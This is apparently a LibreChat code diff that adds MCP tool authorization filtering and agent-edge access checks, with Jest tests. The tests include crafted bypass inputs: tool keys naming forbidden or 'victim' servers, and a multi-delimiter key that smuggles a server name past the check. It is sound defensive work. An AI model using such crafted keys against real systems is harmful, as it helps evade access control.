getAllServerConfigs: mockGetAllServerConfigs,
}));
mockGetAllServerConfigs.mockResolvedValue({
authorizedServer: { type: 'sse', url: 'https://authorized.example.com' },
anotherServer: { type: 'sse', url: 'https://another.example.com' },
});
mockReq = {
user: {
id: new mongoose.Types.ObjectId().toString(),
role: 'USER',
},
body: {},
params: {},
query: {},
app: { locals: { fileStrategy: 'local' } },
};
mockRes = {
status: jest.fn().mockReturnThis(),
json: jest.fn().mockReturnThis(),
};
});
describe('filterAuthorizedTools', () => {
const availableTools = { web_search: true, custom_tool: true };
const userId = 'test-user-123';
test('should keep authorized MCP tools and strip unauthorized ones', async () => {
const result = await filterAuthorizedTools({
tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`, 'web_search'],
userId,
availableTools,
});
expect(result).toContain(`toolA${d}authorizedServer`);
expect(result).toContain('web_search');
expect(result).not.toContain(`toolB${d}forbiddenServer`);
});
test('should keep system tools without querying MCP registry', async () => {
const result = await filterAuthorizedTools({
tools: ['execute_code', 'file_search', 'web_search'],
userId,
availableTools: {},
});
expect(result).toEqual(['execute_code', 'file_search', 'web_search']);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should not query MCP registry when no MCP tools are present', async () => {
const result = await filterAuthorizedTools({
tools: ['web_search', 'custom_tool'],
userId,
availableTools,
});
expect(result).toEqual(['web_search', 'custom_tool']);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should filter all MCP tools when registry is uninitialized', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const result = await filterAuthorizedTools({
tools: [`toolA${d}someServer`, 'web_search'],
userId,
availableTools,
});
expect(result).toEqual(['web_search']);
expect(result).not.toContain(`toolA${d}someServer`);
});
test('should handle mixed authorized and unauthorized MCP tools', async () => {
const result = await filterAuthorizedTools({
tools: [
'web_search',
`search${d}authorizedServer`,
`attack${d}victimServer`,
'execute_code',
`list${d}anotherServer`,
`steal${d}nonexistent`,
],
userId,
availableTools,
});
expect(result).toEqual([
'web_search',
`search${d}authorizedServer`,
'execute_code',
`list${d}anotherServer`,
]);
});
test('should handle empty tools array', async () => {
const result = await filterAuthorizedTools({
tools: [],
userId,
availableTools,
});
expect(result).toEqual([]);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should handle null/undefined tool entries gracefully', async () => {
const result = await filterAuthorizedTools({
tools: [null, undefined, '', 'web_search'],
userId,
availableTools,
});
expect(result).toEqual(['web_search']);
});
test('should call getAllServerConfigs with the correct userId', async () => {
await filterAuthorizedTools({
tools: [`tool${d}authorizedServer`],
userId: 'specific-user-id',
availableTools,
});
expect(mockGetAllServerConfigs).toHaveBeenCalledWith('specific-user-id');
});
test('should only call getAllServerConfigs once even with multiple MCP tools', async () => {
await filterAuthorizedTools({
tools: [`tool1${d}authorizedServer`, `tool2${d}anotherServer`, `tool3${d}unknownServer`],
userId,
availableTools,
});
expect(mockGetAllServerConfigs).toHaveBeenCalledTimes(1);
});
test('should preserve existing MCP tools when registry is unavailable', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const existingTools = [`toolA${d}serverA`, `toolB${d}serverB`];
const result = await filterAuthorizedTools({
tools: [...existingTools, `newTool${d}unknownServer`, 'web_search'],
userId,
availableTools,
existingTools,
});
expect(result).toContain(`toolA${d}serverA`);
expect(result).toContain(`toolB${d}serverB`);
expect(result).toContain('web_search');
expect(result).not.toContain(`newTool${d}unknownServer`);
});
test('should still reject all MCP tools when registry is unavailable and no existingTools', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const result = await filterAuthorizedTools({
tools: [`toolA${d}serverA`, 'web_search'],
userId,
availableTools,
});
expect(result).toEqual(['web_search']);
});
test('should not preserve malformed existing tools when registry is unavailable', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
const malformedTool = `a${d}b${d}c`;
const result = await filterAuthorizedTools({
tools: [malformedTool, `legit${d}serverA`, 'web_search'],
userId,
availableTools,
existingTools: [malformedTool, `legit${d}serverA`],
});
expect(result).toContain(`legit${d}serverA`);
expect(result).toContain('web_search');
expect(result).not.toContain(malformedTool);
});
test('should reject malformed MCP tool keys with multiple delimiters', async () => {
const result = await filterAuthorizedTools({
tools: [
`attack${d}victimServer${d}authorizedServer`,
`legit${d}authorizedServer`,
`a${d}b${d}c${d}d`,
'web_search',
],
userId,
availableTools,
});
expect(result).toEqual([`legit${d}authorizedServer`, 'web_search']);
expect(result).not.toContainEqual(expect.stringContaining('victimServer'));
expect(result).not.toContainEqual(expect.stringContaining(`a${d}b`));
});
});
describe('createAgentHandler - MCP tool authorization', () => {
test('should strip unauthorized MCP tools on create', async () => {
mockReq.body = {
provider: 'openai',
model: 'gpt-4',
name: 'MCP Test Agent',
tools: ['web_search', `validTool${d}authorizedServer`, `attack${d}forbiddenServer`],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const agent = mockRes.json.mock.calls[0][0];
expect(agent.tools).toContain('web_search');
expect(agent.tools).toContain(`validTool${d}authorizedServer`);
expect(agent.tools).not.toContain(`attack${d}forbiddenServer`);
});
test('should not 500 when MCP registry is uninitialized', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.body = {
provider: 'openai',
model: 'gpt-4',
name: 'MCP Uninitialized Test',
tools: [`tool${d}someServer`, 'web_search'],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const agent = mockRes.json.mock.calls[0][0];
expect(agent.tools).toEqual(['web_search']);
});
test('should store mcpServerNames only for authorized servers', async () => {
mockReq.body = {
provider: 'openai',
model: 'gpt-4',
name: 'MCP Names Test',
tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const agent = mockRes.json.mock.calls[0][0];
const agentInDb = await Agent.findOne({ id: agent.id });
expect(agentInDb.mcpServerNames).toContain('authorizedServer');
expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer');
});
});
describe('updateAgentHandler - MCP tool authorization', () => {
let existingAgentId;
let existingAgentAuthorId;
beforeEach(async () => {
existingAgentAuthorId = new mongoose.Types.ObjectId();
const agent = await Agent.create({
id: `agent_${uuidv4()}`,
name: 'Original Agent',
provider: 'openai',
model: 'gpt-4',
author: existingAgentAuthorId,
tools: ['web_search', `existingTool${d}authorizedServer`],
mcpServerNames: ['authorizedServer'],
versions: [
{
name: 'Original Agent',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search', `existingTool${d}authorizedServer`],
createdAt: new Date(),
updatedAt: new Date(),
},
],
});
existingAgentId = agent.id;
});
test('should preserve existing MCP tools even if editor lacks access', async () => {
mockGetAllServerConfigs.mockResolvedValue({});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.tools).toContain('web_search');
});
test('should reject newly added unauthorized MCP tools', async () => {
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`, `attack${d}forbiddenServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain('web_search');
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.tools).not.toContain(`attack${d}forbiddenServer`);
});
test('should allow adding authorized MCP tools', async () => {
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`, `newTool${d}anotherServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`newTool${d}anotherServer`);
});
test('should not query MCP registry when no new MCP tools added', async () => {
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
});
test('should preserve existing MCP tools when registry unavailable and user edits agent', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
name: 'Renamed After Restart',
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.tools).toContain('web_search');
expect(updatedAgent.name).toBe('Renamed After Restart');
});
test('should preserve existing MCP tools when server not in configs (disconnected)', async () => {
mockGetAllServerConfigs.mockResolvedValue({});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = {
name: 'Edited While Disconnected',
tools: ['web_search', `existingTool${d}authorizedServer`],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const updatedAgent = mockRes.json.mock.calls[0][0];
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
expect(updatedAgent.name).toBe('Edited While Disconnected');
});
});
describe('duplicateAgentHandler - MCP tool authorization', () => {
let sourceAgentId;
let sourceAgentAuthorId;
beforeEach(async () => {
sourceAgentAuthorId = new mongoose.Types.ObjectId();
const agent = await Agent.create({
id: `agent_${uuidv4()}`,
name: 'Source Agent',
provider: 'openai',
model: 'gpt-4',
author: sourceAgentAuthorId,
tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`],
mcpServerNames: ['authorizedServer', 'forbiddenServer'],
versions: [
{
name: 'Source Agent',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`],
createdAt: new Date(),
updatedAt: new Date(),
},
],
});
sourceAgentId = agent.id;
});
test('should strip unauthorized MCP tools from duplicated agent', async () => {
mockGetAllServerConfigs.mockResolvedValue({
authorizedServer: { type: 'sse' },
});
mockReq.user.id = sourceAgentAuthorId.toString();
mockReq.params.id = sourceAgentId;
await duplicateAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const { agent: newAgent } = mockRes.json.mock.calls[0][0];
expect(newAgent.id).not.toBe(sourceAgentId);
expect(newAgent.tools).toContain('web_search');
expect(newAgent.tools).toContain(`tool${d}authorizedServer`);
expect(newAgent.tools).not.toContain(`tool${d}forbiddenServer`);
const agentInDb = await Agent.findOne({ id: newAgent.id });
expect(agentInDb.mcpServerNames).toContain('authorizedServer');
expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer');
});
test('should preserve source agent MCP tools when registry is unavailable', async () => {
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.user.id = sourceAgentAuthorId.toString();
mockReq.params.id = sourceAgentId;
await duplicateAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
const { agent: newAgent } = mockRes.json.mock.calls[0][0];
expect(newAgent.tools).toContain('web_search');
expect(newAgent.tools).toContain(`tool${d}authorizedServer`);
expect(newAgent.tools).toContain(`tool${d}forbiddenServer`);
});
});
describe('revertAgentVersionHandler - MCP tool authorization', () => {
let existingAgentId;
let existingAgentAuthorId;
beforeEach(async () => {
existingAgentAuthorId = new mongoose.Types.ObjectId();
const agent = await Agent.create({
id: `agent_${uuidv4()}`,
name: 'Reverted Agent V2',
provider: 'openai',
model: 'gpt-4',
author: existingAgentAuthorId,
tools: ['web_search'],
versions: [
{
name: 'Reverted Agent V1',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search', `oldTool${d}revokedServer`],
createdAt: new Date(Date.now() - 10000),
updatedAt: new Date(Date.now() - 10000),
},
{
name: 'Reverted Agent V2',
provider: 'openai',
model: 'gpt-4',
tools: ['web_search'],
createdAt: new Date(),
updatedAt: new Date(),
},
],
});
existingAgentId = agent.id;
});
test('should strip unauthorized MCP tools after reverting to a previous version', async () => {
mockGetAllServerConfigs.mockResolvedValue({
authorizedServer: { type: 'sse' },
});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = { version_index: 0 };
await revertAgentVersionHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const result = mockRes.json.mock.calls[0][0];
expect(result.tools).toContain('web_search');
expect(result.tools).not.toContain(`oldTool${d}revokedServer`);
const agentInDb = await Agent.findOne({ id: existingAgentId });
expect(agentInDb.tools).toContain('web_search');
expect(agentInDb.tools).not.toContain(`oldTool${d}revokedServer`);
});
test('should keep authorized MCP tools after revert', async () => {
await Agent.updateOne(
{ id: existingAgentId },
{ $set: { 'versions.0.tools': ['web_search', `tool${d}authorizedServer`] } },
);
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = { version_index: 0 };
await revertAgentVersionHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const result = mockRes.json.mock.calls[0][0];
expect(result.tools).toContain('web_search');
expect(result.tools).toContain(`tool${d}authorizedServer`);
});
test('should preserve version MCP tools when registry is unavailable on revert', async () => {
await Agent.updateOne(
{ id: existingAgentId },
{
$set: {
'versions.0.tools': [
'web_search',
`validTool${d}authorizedServer`,
`otherTool${d}anotherServer`,
],
},
},
);
getMCPServersRegistry.mockImplementation(() => {
throw new Error('MCPServersRegistry has not been initialized.');
});
mockReq.user.id = existingAgentAuthorId.toString();
mockReq.params.id = existingAgentId;
mockReq.body = { version_index: 0 };
await revertAgentVersionHandler(mockReq, mockRes);
expect(mockRes.json).toHaveBeenCalled();
const result = mockRes.json.mock.calls[0][0];
expect(result.tools).toContain('web_search');
expect(result.tools).toContain(`validTool${d}authorizedServer`);
expect(result.tools).toContain(`otherTool${d}anotherServer`);
const agentInDb = await Agent.findOne({ id: existingAgentId });
expect(agentInDb.tools).toContain(`validTool${d}authorizedServer`);
expect(agentInDb.tools).toContain(`otherTool${d}anotherServer`);
});
});
});

View file

@ -265,6 +265,7 @@ const OpenAIChatCompletionController = async (req, res) => {
toolRegistry: primaryConfig.toolRegistry, toolRegistry: primaryConfig.toolRegistry,
userMCPAuthMap: primaryConfig.userMCPAuthMap, userMCPAuthMap: primaryConfig.userMCPAuthMap,
tool_resources: primaryConfig.tool_resources, tool_resources: primaryConfig.tool_resources,
actionsEnabled: primaryConfig.actionsEnabled,
}); });
}, },
toolEndCallback, toolEndCallback,

View file

@ -429,6 +429,7 @@ const createResponse = async (req, res) => {
toolRegistry: primaryConfig.toolRegistry, toolRegistry: primaryConfig.toolRegistry,
userMCPAuthMap: primaryConfig.userMCPAuthMap, userMCPAuthMap: primaryConfig.userMCPAuthMap,
tool_resources: primaryConfig.tool_resources, tool_resources: primaryConfig.tool_resources,
actionsEnabled: primaryConfig.actionsEnabled,
}); });
}, },
toolEndCallback, toolEndCallback,
@ -586,6 +587,7 @@ const createResponse = async (req, res) => {
toolRegistry: primaryConfig.toolRegistry, toolRegistry: primaryConfig.toolRegistry,
userMCPAuthMap: primaryConfig.userMCPAuthMap, userMCPAuthMap: primaryConfig.userMCPAuthMap,
tool_resources: primaryConfig.tool_resources, tool_resources: primaryConfig.tool_resources,
actionsEnabled: primaryConfig.actionsEnabled,
}); });
}, },
toolEndCallback, toolEndCallback,

View file

@ -6,6 +6,7 @@ const {
agentCreateSchema, agentCreateSchema,
agentUpdateSchema, agentUpdateSchema,
refreshListAvatars, refreshListAvatars,
collectEdgeAgentIds,
mergeAgentOcrConversion, mergeAgentOcrConversion,
MAX_AVATAR_REFRESH_AGENTS, MAX_AVATAR_REFRESH_AGENTS,
convertOcrToContextInPlace, convertOcrToContextInPlace,
@ -35,6 +36,7 @@ const {
} = require('~/models/Agent'); } = require('~/models/Agent');
const { const {
findPubliclyAccessibleResources, findPubliclyAccessibleResources,
getResourcePermissionsMap,
findAccessibleResources, findAccessibleResources,
hasPublicPermission, hasPublicPermission,
grantPermission, grantPermission,
@ -47,6 +49,7 @@ const { refreshS3Url } = require('~/server/services/Files/S3/crud');
const { filterFile } = require('~/server/services/Files/process'); const { filterFile } = require('~/server/services/Files/process');
const { updateAction, getActions } = require('~/models/Action'); const { updateAction, getActions } = require('~/models/Action');
const { getCachedTools } = require('~/server/services/Config'); const { getCachedTools } = require('~/server/services/Config');
const { getMCPServersRegistry } = require('~/config');
const { getLogStores } = require('~/cache'); const { getLogStores } = require('~/cache');
const systemTools = { const systemTools = {
@ -58,6 +61,116 @@ const systemTools = {
const MAX_SEARCH_LEN = 100; const MAX_SEARCH_LEN = 100;
const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
/**
* Validates that the requesting user has VIEW access to every agent referenced in edges.
* Agents that do not exist in the database are skipped at create time, the `from` field
* often references the agent being built, which has no DB record yet.
* @param {import('librechat-data-provider').GraphEdge[]} edges
* @param {string} userId
* @param {string} userRole - Used for group/role principal resolution
* @returns {Promise<string[]>} Agent IDs the user cannot VIEW (empty if all accessible)
*/
const validateEdgeAgentAccess = async (edges, userId, userRole) => {
const edgeAgentIds = collectEdgeAgentIds(edges);
if (edgeAgentIds.size === 0) {
return [];
}
const agents = (await Promise.all([...edgeAgentIds].map((id) => getAgent({ id })))).filter(
Boolean,
);
if (agents.length === 0) {
return [];
}
const permissionsMap = await getResourcePermissionsMap({
userId,
role: userRole,
resourceType: ResourceType.AGENT,
resourceIds: agents.map((a) => a._id),
});
return agents
.filter((a) => {
const bits = permissionsMap.get(a._id.toString()) ?? 0;
return (bits & PermissionBits.VIEW) === 0;
})
.map((a) => a.id);
};
/**
* Filters tools to only include those the user is authorized to use.
* MCP tools must match the exact format `{toolName}_mcp_{serverName}` (exactly 2 segments).
* Multi-delimiter keys are rejected to prevent authorization/execution mismatch.
* Non-MCP tools must appear in availableTools (global tool cache) or systemTools.
*
* When `existingTools` is provided and the MCP registry is unavailable (e.g. server restart),
* tools already present on the agent are preserved rather than stripped they were validated
* when originally added, and we cannot re-verify them without the registry.
* @param {object} params
* @param {string[]} params.tools - Raw tool strings from the request
* @param {string} params.userId - Requesting user ID for MCP server access check
* @param {Record<string, unknown>} params.availableTools - Global non-MCP tool cache
* @param {string[]} [params.existingTools] - Tools already persisted on the agent document
* @returns {Promise<string[]>} Only the authorized subset of tools
*/
const filterAuthorizedTools = async ({ tools, userId, availableTools, existingTools }) => {
const filteredTools = [];
let mcpServerConfigs;
let registryUnavailable = false;
const existingToolSet = existingTools?.length ? new Set(existingTools) : null;
for (const tool of tools) {
if (availableTools[tool] || systemTools[tool]) {
filteredTools.push(tool);
continue;
}
if (!tool?.includes(Constants.mcp_delimiter)) {
continue;
}
if (mcpServerConfigs === undefined) {
try {
mcpServerConfigs = (await getMCPServersRegistry().getAllServerConfigs(userId)) ?? {};
} catch (e) {
logger.warn(
'[filterAuthorizedTools] MCP registry unavailable, filtering all MCP tools',
e.message,
);
mcpServerConfigs = {};
registryUnavailable = true;
}
}
const parts = tool.split(Constants.mcp_delimiter);
if (parts.length !== 2) {
logger.warn(
`[filterAuthorizedTools] Rejected malformed MCP tool key "${tool}" for user ${userId}`,
);
continue;
}
if (registryUnavailable && existingToolSet?.has(tool)) {
filteredTools.push(tool);
continue;
}
const [, serverName] = parts;
if (!serverName || !Object.hasOwn(mcpServerConfigs, serverName)) {
logger.warn(
`[filterAuthorizedTools] Rejected MCP tool "${tool}" — server "${serverName}" not accessible to user ${userId}`,
);
continue;
}
filteredTools.push(tool);
}
return filteredTools;
};
/** /**
* Creates an Agent. * Creates an Agent.
* @route POST /Agents * @route POST /Agents
@ -75,22 +188,24 @@ const createAgentHandler = async (req, res) => {
agentData.model_parameters = removeNullishValues(agentData.model_parameters, true); agentData.model_parameters = removeNullishValues(agentData.model_parameters, true);
} }
const { id: userId } = req.user; const { id: userId, role: userRole } = req.user;
if (agentData.edges?.length) {
const unauthorized = await validateEdgeAgentAccess(agentData.edges, userId, userRole);
if (unauthorized.length > 0) {
return res.status(403).json({
error: 'You do not have access to one or more agents referenced in edges',
agent_ids: unauthorized,
});
}
}
agentData.id = `agent_${nanoid()}`; agentData.id = `agent_${nanoid()}`;
agentData.author = userId; agentData.author = userId;
agentData.tools = []; agentData.tools = [];
const availableTools = (await getCachedTools()) ?? {}; const availableTools = (await getCachedTools()) ?? {};
for (const tool of tools) { agentData.tools = await filterAuthorizedTools({ tools, userId, availableTools });
if (availableTools[tool]) {
agentData.tools.push(tool);
} else if (systemTools[tool]) {
agentData.tools.push(tool);
} else if (tool.includes(Constants.mcp_delimiter)) {
agentData.tools.push(tool);
}
}
const agent = await createAgent(agentData); const agent = await createAgent(agentData);
@ -243,6 +358,17 @@ const updateAgentHandler = async (req, res) => {
updateData.avatar = avatarField; updateData.avatar = avatarField;
} }
if (updateData.edges?.length) {
const { id: userId, role: userRole } = req.user;
const unauthorized = await validateEdgeAgentAccess(updateData.edges, userId, userRole);
if (unauthorized.length > 0) {
return res.status(403).json({
error: 'You do not have access to one or more agents referenced in edges',
agent_ids: unauthorized,
});
}
}
// Convert OCR to context in incoming updateData // Convert OCR to context in incoming updateData
convertOcrToContextInPlace(updateData); convertOcrToContextInPlace(updateData);
@ -261,6 +387,26 @@ const updateAgentHandler = async (req, res) => {
updateData.tools = ocrConversion.tools; updateData.tools = ocrConversion.tools;
} }
if (updateData.tools) {
const existingToolSet = new Set(existingAgent.tools ?? []);
const newMCPTools = updateData.tools.filter(
(t) => !existingToolSet.has(t) && t?.includes(Constants.mcp_delimiter),
);
if (newMCPTools.length > 0) {
const availableTools = (await getCachedTools()) ?? {};
const approvedNew = await filterAuthorizedTools({
tools: newMCPTools,
userId: req.user.id,
availableTools,
});
const rejectedSet = new Set(newMCPTools.filter((t) => !approvedNew.includes(t)));
if (rejectedSet.size > 0) {
updateData.tools = updateData.tools.filter((t) => !rejectedSet.has(t));
}
}
}
let updatedAgent = let updatedAgent =
Object.keys(updateData).length > 0 Object.keys(updateData).length > 0
? await updateAgent({ id }, updateData, { ? await updateAgent({ id }, updateData, {
@ -371,7 +517,7 @@ const duplicateAgentHandler = async (req, res) => {
*/ */
const duplicateAction = async (action) => { const duplicateAction = async (action) => {
const newActionId = nanoid(); const newActionId = nanoid();
const [domain] = action.action_id.split(actionDelimiter); const { domain } = action.metadata;
const fullActionId = `${domain}${actionDelimiter}${newActionId}`; const fullActionId = `${domain}${actionDelimiter}${newActionId}`;
// Sanitize sensitive metadata before persisting // Sanitize sensitive metadata before persisting
@ -381,7 +527,7 @@ const duplicateAgentHandler = async (req, res) => {
} }
const newAction = await updateAction( const newAction = await updateAction(
{ action_id: newActionId }, { action_id: newActionId, agent_id: newAgentId },
{ {
metadata: filteredMetadata, metadata: filteredMetadata,
agent_id: newAgentId, agent_id: newAgentId,
@ -403,6 +549,17 @@ const duplicateAgentHandler = async (req, res) => {
const agentActions = await Promise.all(promises); const agentActions = await Promise.all(promises);
newAgentData.actions = agentActions; newAgentData.actions = agentActions;
if (newAgentData.tools?.length) {
const availableTools = (await getCachedTools()) ?? {};
newAgentData.tools = await filterAuthorizedTools({
tools: newAgentData.tools,
userId,
availableTools,
existingTools: newAgentData.tools,
});
}
const newAgent = await createAgent(newAgentData); const newAgent = await createAgent(newAgentData);
try { try {
@ -731,7 +888,24 @@ const revertAgentVersionHandler = async (req, res) => {
// Permissions are enforced via route middleware (ACL EDIT) // Permissions are enforced via route middleware (ACL EDIT)
const updatedAgent = await revertAgentVersion({ id }, version_index); let updatedAgent = await revertAgentVersion({ id }, version_index);
if (updatedAgent.tools?.length) {
const availableTools = (await getCachedTools()) ?? {};
const filteredTools = await filterAuthorizedTools({
tools: updatedAgent.tools,
userId: req.user.id,
availableTools,
existingTools: updatedAgent.tools,
});
if (filteredTools.length !== updatedAgent.tools.length) {
updatedAgent = await updateAgent(
{ id },
{ tools: filteredTools },
{ updatingUserId: req.user.id },
);
}
}
if (updatedAgent.author) { if (updatedAgent.author) {
updatedAgent.author = updatedAgent.author.toString(); updatedAgent.author = updatedAgent.author.toString();
@ -799,4 +973,5 @@ module.exports = {
uploadAgentAvatar: uploadAgentAvatarHandler, uploadAgentAvatar: uploadAgentAvatarHandler,
revertAgentVersion: revertAgentVersionHandler, revertAgentVersion: revertAgentVersionHandler,
getAgentCategories, getAgentCategories,
filterAuthorizedTools,
}; };

View file

@ -2,7 +2,7 @@ const mongoose = require('mongoose');
const { nanoid } = require('nanoid'); const { nanoid } = require('nanoid');
const { v4: uuidv4 } = require('uuid'); const { v4: uuidv4 } = require('uuid');
const { agentSchema } = require('@librechat/data-schemas'); const { agentSchema } = require('@librechat/data-schemas');
const { FileSources } = require('librechat-data-provider'); const { FileSources, PermissionBits } = require('librechat-data-provider');
const { MongoMemoryServer } = require('mongodb-memory-server'); const { MongoMemoryServer } = require('mongodb-memory-server');
// Only mock the dependencies that are not database-related // Only mock the dependencies that are not database-related
@ -46,9 +46,9 @@ jest.mock('~/models/File', () => ({
jest.mock('~/server/services/PermissionService', () => ({ jest.mock('~/server/services/PermissionService', () => ({
findAccessibleResources: jest.fn().mockResolvedValue([]), findAccessibleResources: jest.fn().mockResolvedValue([]),
findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]), findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
getResourcePermissionsMap: jest.fn().mockResolvedValue(new Map()),
grantPermission: jest.fn(), grantPermission: jest.fn(),
hasPublicPermission: jest.fn().mockResolvedValue(false), hasPublicPermission: jest.fn().mockResolvedValue(false),
checkPermission: jest.fn().mockResolvedValue(true),
})); }));
jest.mock('~/models', () => ({ jest.mock('~/models', () => ({
@ -74,6 +74,7 @@ const {
const { const {
findAccessibleResources, findAccessibleResources,
findPubliclyAccessibleResources, findPubliclyAccessibleResources,
getResourcePermissionsMap,
} = require('~/server/services/PermissionService'); } = require('~/server/services/PermissionService');
const { refreshS3Url } = require('~/server/services/Files/S3/crud'); const { refreshS3Url } = require('~/server/services/Files/S3/crud');
@ -1647,4 +1648,112 @@ describe('Agent Controllers - Mass Assignment Protection', () => {
expect(agent.avatar.filepath).toBe('old-s3-path.jpg'); expect(agent.avatar.filepath).toBe('old-s3-path.jpg');
}); });
}); });
describe('Edge ACL validation', () => {
let targetAgent;
beforeEach(async () => {
targetAgent = await Agent.create({
id: `agent_${nanoid()}`,
author: new mongoose.Types.ObjectId().toString(),
name: 'Target Agent',
provider: 'openai',
model: 'gpt-4',
tools: [],
});
});
test('createAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => {
const permMap = new Map();
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
mockReq.body = {
name: 'Attacker Agent',
provider: 'openai',
model: 'gpt-4',
edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(403);
const response = mockRes.json.mock.calls[0][0];
expect(response.agent_ids).toContain(targetAgent.id);
});
test('createAgentHandler should succeed when user has VIEW on all edge-referenced agents', async () => {
const permMap = new Map([[targetAgent._id.toString(), 1]]);
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
mockReq.body = {
name: 'Legit Agent',
provider: 'openai',
model: 'gpt-4',
edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
});
test('createAgentHandler should allow edges referencing non-existent agents (self-reference at create time)', async () => {
mockReq.body = {
name: 'Self-Ref Agent',
provider: 'openai',
model: 'gpt-4',
edges: [{ from: 'agent_does_not_exist_yet', to: 'agent_also_new', edgeType: 'handoff' }],
};
await createAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(201);
});
test('updateAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => {
const ownedAgent = await Agent.create({
id: `agent_${nanoid()}`,
author: mockReq.user.id,
name: 'Owned Agent',
provider: 'openai',
model: 'gpt-4',
tools: [],
});
const permMap = new Map([[ownedAgent._id.toString(), PermissionBits.VIEW]]);
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
mockReq.params = { id: ownedAgent.id };
mockReq.body = {
edges: [{ from: ownedAgent.id, to: targetAgent.id, edgeType: 'handoff' }],
};
await updateAgentHandler(mockReq, mockRes);
expect(mockRes.status).toHaveBeenCalledWith(403);
const response = mockRes.json.mock.calls[0][0];
expect(response.agent_ids).toContain(targetAgent.id);
expect(response.agent_ids).not.toContain(ownedAgent.id);
});
test('updateAgentHandler should succeed when edges field is absent from payload', async () => {
const ownedAgent = await Agent.create({
id: `agent_${nanoid()}`,
author: mockReq.user.id,
name: 'Owned Agent',
provider: 'openai',
model: 'gpt-4',
tools: [],
});
mockReq.params = { id: ownedAgent.id };
mockReq.body = { name: 'Renamed Agent' };
await updateAgentHandler(mockReq, mockRes);
